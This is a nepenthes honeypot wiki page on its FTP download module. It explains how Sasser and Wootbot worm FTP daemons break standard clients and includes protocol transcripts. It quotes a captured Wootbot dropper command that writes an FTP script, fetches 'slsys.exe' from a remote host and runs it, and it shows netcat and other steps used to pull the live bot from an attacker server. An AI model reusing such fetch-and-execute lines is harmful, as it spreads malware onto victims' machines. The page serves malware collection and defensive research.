download-ftp

Description

download-ftp provides support for

  • ftp

protocoll

As the ftp client windows ships is far away from being rfc compilant, curl can not be used to download files via ftp.

You may want to have a look at collected malware ftp daemon fingerprints

The Sasser Problem

The problem:

Windows ftp.exe uses active ftp without EPRT, curl can be forced to use this old standard, by setting CURLOPT_PORT and CURLOPT_EPRT, but some broken ftp daemon implementations respond wiered to commands they do not understand.

example: sasser

<- 220 OK
 
-> USER anonymous
<- 331 OK
 
-> PASS guest
<- 230 OK
 
-> PWD
<- 226 OK
 
-> EPSV
<- 226 OK
 
-> PASV
<- 226 OK
 
-> QUIT

sasser can not server passive ftp (PASV), and responds with 226 OK.

if we set PORT we get this:


<- 220 OK

-> USER anonymous
<- 331 OK

-> PASS bin
<- 230 OK

-> PWD
<- 226 OK

-> EPRT |1|192.168.0.23|40048|
<- 226 OK

-> LPRT 4,4,192,168,0,23,2,156,113
<- 226 OK

-> PORT 192,168,0,23,156,114
<- 200 OK

-> TYPE I
<- 226 OK

-> QUIT

curl tries to use EPRT and LPRT and the sasser ftp daemon is not able to reply correctly. curl disconnects again

so we tell curl not to use EPRT.

<- 220 OK

-> USER anonymous
<- 331 OK

-> PASS bin
<- 230 OK

-> PWD
<- 226 OK

-> PORT 192,168,0,23,156,119
<- 200 OK

-> TYPE I
<- 226 OK


-> QUIT

curl tries to set TYPE, the sasser ftpd is not able to respond properly, curl recognizes this as error, and disconnects. At the moment there is no possibilty to make curl not sending TYPE or ignoring the reply curl gets to the TYPE request.

this is how the windows ftp.exe client does it.

<- 220 OK

-> USER anonymous
<- 331 OK

-> PASS bin
<- 230 OK

-> PORT 192,168,0,23,4,195
<- 200 OK

-> RETR 11576_up.exe
<- 150 OK

<- 226 OK
-> QUIT

and obviously this worked fine.

so we can not curl to download all the fine sasser variants out there, and have to emulate the broken windows ftp client on our own.

some further words about the sasser ftp daemon

Sasser Authors Statement

The appearance of the new Sasser worms is seemingly directly linked to the wave of viruses blighting the Internet over the last few months. PandaLabs has also detected the new Netsky.AC worm, which like its predecessors contains a message hidden inside its code. On this occasion however, there are no insulting messages to the authors of other worms such as Bagle or Mydoom, but instead a message directed at antivirus vendors. The message claims that the authors are also responsible for the Sasser worms:

Hey, av firms, do you know that we have programmed the sasser virus?!?. 
Yeah thats true! 
Why do you have named it sasser? 
A Tip: Compare the FTP-Server code with the one from Skynet.V!!! 
LooL! 
We are the Skynet...' 
Here is an part of the sasser sourcecode you named so, lol 

The w00tbot issue

looking at the logs we found some tries to download a file called “slsys.exe” but no try was a success ... so we digged deeper, got the line to download the file from the logs

cmd /c echo open 212.XXX.184.53 2812 » ii &echo user a a » ii &echo binary » ii &echo get slsys.exe » ii &echo bye » ii &ftp -n -v -s:ii &del ii &slsys.exe

and found a box that was still online serving the file ( the above is down ).

before we start some words about the file we put it into http://www.virustotal.com

Scanner Version Signature Date Result
AntiVir 6.31.1.0 09.09.2005 no virus found
Avast 4.6.695.0 09.09.2005 no virus found
AVG 718 09.09.2005 BackDoor.Wootbot.FH
Avira 6.31.1.0 09.09.2005 no virus found
BitDefender 7.0 09.02.2005 Backdoor.SDBot.21A6B5E4
CAT-QuickHeal 8.00 09.09.2005 (Suspicious) - DNAScan
ClamAV devel-20050725 09.09.2005 no virus found
DrWeb 4.32b 09.09.2005 no virus found
eTrust-Iris 7.1.194.0 09.09.2005 Win32/SdBot.88309!Worm
eTrust-Vet 11.9.1.0 09.09.2005 Win32.ForBot.PY
Fortinet 2.41.0.0 09.07.2005 suspicious
F-Prot 3.16c 09.09.2005 no virus found
Ikarus 0.2.59.0 09.09.2005 no virus found
Kaspersky 4.0.2.24 09.09.2005 Backdoor.Win32.Wootbot.gen
McAfee 4578 09.09.2005 no virus found
NOD32v2 1.1213 09.09.2005 a variant of Win32/Agobot
Norman 5.70.10 09.09.2005 no virus found
Panda 8.02.00 09.09.2005 no virus found
Sophos 3.97.0 09.09.2005 no virus found
Symantec 8.0 09.09.2005 no virus found
TheHacker 5.8.2.102 09.08.2005 no virus found
VBA32 3.10.4 09.09.2005 Backdoor.Win32.Wootbot.gen

gaining a valid copy of the file was really hard,

  • microsoft windows ftp client would work i guess, but i natted myself, so the active ftp transferr failed
  • nepenthes could not download it
  • wget segfaulted
  • curl denied service due to protocol issues
  • lftp failed
  • netkit 0.17 ftp downloaded the file but saved it as ascii text ...

microsoft windows ftp client

<- 220

-> USER a
<- 331 

-> PASS a
<- 230 

-> TYPE I
<- 200 

-> PORT 192,168,0,23,4,195
<- 200 OK

-> RETR slsys.exe
<- 150 OK

-> QUIT
<- 226 OK

this would get the file, but is useless if your running nepenthes ...

Nepenthes

As nepenthes does not send the TYPE I request to set binary mode the virus ftp server fails sending the file.

wget

If you think the nepenthes download-ftp did worse, look at wget ...

wget ftp://a:a@212.XXX.83.137:1609/slsys.exe
--00:06:18--  ftp://a:*password*@212.XXX.83.137:1609/slsys.exe
           => `slsys.exe'
Connecting to 212.XXX.83.137:1609... verbunden.
Anmelden als a ... Angemeldet!
==> SYST ... Speicherzugriffsfehler

We ran wget in valgrind compiled from source.

==> SYST ... 
==13841==
==13841== Invalid read of size 1
==13841==    at 0x1BA72E52: strcasecmp (in /lib/libc-2.3.4.so)
==13841==    by 0x8052D5C: ftp_syst (in /tmp/installed-wget/bin/wget)
==13841==    by 0x804FFBF: getftp (in /tmp/installed-wget/bin/wget)
==13841==    by 0x805087A: ftp_loop_internal (in /tmp/installed-wget/bin/wget)
==13841==    by 0x8051E2B: ftp_loop (in /tmp/installed-wget/bin/wget)
==13841==    by 0x8064185: retrieve_url (in /tmp/installed-wget/bin/wget)
==13841==    by 0x8060267: main (in /tmp/installed-wget/bin/wget)
==13841==  Address 0x0 is not stack'd, malloc'd or (recently) free'd

looking into the source gave us this

/* Which system type has been reported (we are interested just in the
   first word of the server response)?  */
   request = strtok (NULL, " ");

request is not checked for being NULL.

checking request for being NULL gave us the result wget would crash on the next reply ...

curl

so, wget hit the wall, and what about curl?

curl --verbose  --disable-eprt --ftp-port - --verbose  ftp://a:a@212.XXX.83.137:1609/slsys.exe
* About to connect() to 212.XXX.83.137 port 1609
*   Trying 212.XXX.83.137... connected
* Connected to 212.XXX.83.137 (212.XXX.83.137) port 1609
< 220
> USER a
< 331
> PASS a
< 230
> PWD
< 200
> PORT 134,61,128,10,10,10
< 200
* Connect data stream actively
> TYPE I
< 150
* Couldn't set desired mode
* Connection #0 to host 212.202.83.137 left intact
curl: (17) Couldn't set desired mode
> QUIT
< 226
* Closing connection #0

curl does _not_ crash ... but does not download too ... not sending PWD and sending TYPE I before sending PORT and curl would get it done.

lftp

lftp simply failed.

$ lftp
lftp :~> debug 10
lftp :~> open ftp://a:a@212.XXX.83.137:1609
---- Resolving host address...
---- 1 address found
lftp a@212.202.83.137:~> user a
Password:

lftp a@212.XXX.83.137:~> get slsys.exe
dns cache hit
---- Connecting to 212.XXX.83.137 (212.XXX.83.137) port 1609
<--- 220
---> FEAT
<--- 331
---> AUTH TLS
<--- 230
---> USER a
**** gnutls_handshake: A record packet with illegal version was received.
---- Closing control socket
get: Fatal error: gnutls_handshake: A record packet with illegal version was received.

so we switched ssl off.

lftp a@212.XXX.83.137:~> set ftp:ssl-allow off

retried getting the file

lftp a@212.XXX.83.137:~> get slsys.exe
dns cache hit
---- Connecting to 212.XXX.83.137 (212.XXX.83.137) port 1609
<--- 220
---> FEAT
<--- 331
---> USER a
<--- 230
---> PWD
<--- 200
---> TYPE I
<--- 200
---> SIZE slsys.exe
<--- 150
<--- 226
---> MDTM slsys.exe
<--- 221
---> PASV
**** Peer closed connection
---- Closing data socket
---- Closing control socket
Interrupt

disabled passive mode

lftp a@212.XXX.83.137:~> set ftp:passive-mode off

retried getting the file

lftp a@212.XXX.83.137:~> get slsys.exe
dns cache hit
---- Connecting to 212.XXX.83.137 (212.XXX.83.137) port 1609
<--- 220
---> FEAT
<--- 331
---> USER a
<--- 230
---> PWD
<--- 200
---> TYPE I
<--- 200
---> SIZE slsys.exe
<--- 150
<--- 226
---> MDTM slsys.exe
<--- 221
---> PORT 192,168,0,23,10,17
**** Peer closed connection
---- Closing data socket
---- Closing control socket
Interrupt
lftp a@212.XXX.83.137:~>

and it still failed. PWD SIZE and MDTM puzzle the virus ftp daemon.

netkit ftp

he at least downloaded the file, but converted it to ascii format ...

$ ftp
ftp> debug
Debugging on (debug=1).
ftp> verbose
Verbose mode off.
ftp> verbose
Verbose mode on.
ftp>  open 212.XXX.83.137 1609
Connected to 212.XXX.83.137.
220
ftp: setsockopt: Bad file descriptor
Name (212.XXX.83.137:user): a
---> USER a
331
Password:
---> PASS XXXX
230
---> SYST
200
Remote system type is .
ftp> get slsys.exe
local: slsys.exe remote: slsys.exe
ftp: setsockopt (ignored): Permission denied
---> PORT 192,168,0,23,10,22
200
---> RETR slsys.exe
150
WARNING! 351 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226
88309 bytes received in 0.77 secs (112.2 kB/s)

this ftp client does _not_ send the TYPE I, but sends SYST instead, and accepts the reply as valid. the file we get is b0rked as the ftp client saves it as a text file. putting the client in binary mode, make him send “TYPE I” and breaks the virus ftp daemons command order.

netcat -- the ultimate solution

we opend a controll connection, send the user, pass, syst, port and retr requests, and accepted the file on using another netcat in listen mode.

nc -vv -l -p 2539 > /tmp/slsys.exe
$ nc 212.XXX.83.137 1609
<- 220
-> USER a
<- 331
-> PASS a
<- 230
-> SYST
<- 200
-> PORT 192,168,0,23,9,235
<- 200
-> RETR slsys.exe
<- 150
<- 226

so, using netcat we were able to download the file.

The w00tbot solution

FIXME

Config File

currently there is none.

Implementation

I had to write the whole DNS* stuff to get this working properly.

FIXME

Dependencies

depends on nothing.

 
documentation/modules/downloadhandler/download_ftp.txt · Last modified: 2006/02/17 14:01
 
Recent changes RSS feed Creative Commons License Donate Powered by PHP Valid XHTML 1.0 Valid CSS Driven by DokuWiki